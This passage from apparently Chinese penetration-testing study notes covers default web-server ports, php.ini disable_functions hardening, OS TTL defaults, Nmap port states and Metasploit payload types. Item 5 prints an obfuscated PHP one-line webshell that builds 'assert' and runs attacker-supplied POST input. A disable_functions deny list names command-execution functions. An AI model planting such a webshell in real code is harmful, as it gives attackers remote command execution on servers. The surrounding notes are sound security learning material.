8080(tomcat服务器默认、kangle服务器默认)
3128(Squid服务器默认)
8081(用户习惯)
9080(WebSpher服务器默认)
7001(weblogic的默认端口)
4. 在php.ini禁止一些危险函数的执行:
如果不希望执行包括system()等在那的能够执行命令的php函数,或者能够查看php信息的phpinfo()等函数,那么我们就可以禁止它们:
disable_functions = system,passthru,exec,shell_exec,popen,phpinfo
如果你要禁止任何文件和目录的操作,那么可以关闭很多文件操作:
disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir, rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown
此时就能够抵制大部分的phpshell了。
5. 一个非常聪(淫)明(荡)的隐藏一句话方法:
$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4};
@$asse($_POST[$_GET['s']]);
6. 默认情况下,Linux系统的TTL值为64或255,Windows NT/2000/XP系统的默认TTL
值为128,Win7系统的TTL值是64,Windows 98系统的TTL值为32,UNIX主机的TTL值为255。(但这是可以修改的)
7. 在使用Nmap扫描端口的时候,端口状态可能会出现filtered / unfiltered.filtered是指有防
火墙或是其他过滤装置在对这个端口进行过滤,所以Nmap需要进一步查明端口是否开放;unfiltered状态只有在大多数的扫描端口都处在filter状态下才出现,说明Nmap能够访问这个端口,但是不清楚这个端口打开的状态。
8. 安全漏洞生命周期(图片摘自诸葛建伟《Matesploit渗透测试魔鬼训练营》)
9. msfpayload、msfencode和msfvenom可以将攻击载荷封装为可执行文件、C语言、
JavaScript语言等多种形式,并可以进行各种类型的编码。
10. Metasploit攻击载荷模块分为独立(Singles)、传输器(Stager)、传输体(Stage)三种类
型。例如:“windows/shell_bind_tcp”是一个独立攻击载荷。“windows/shell/bind_tcp”是一个由传输器载荷(bind_tcp)和一个传输体载荷(shell)所组成,其功能相当于“windows/shell_bind_tcp”。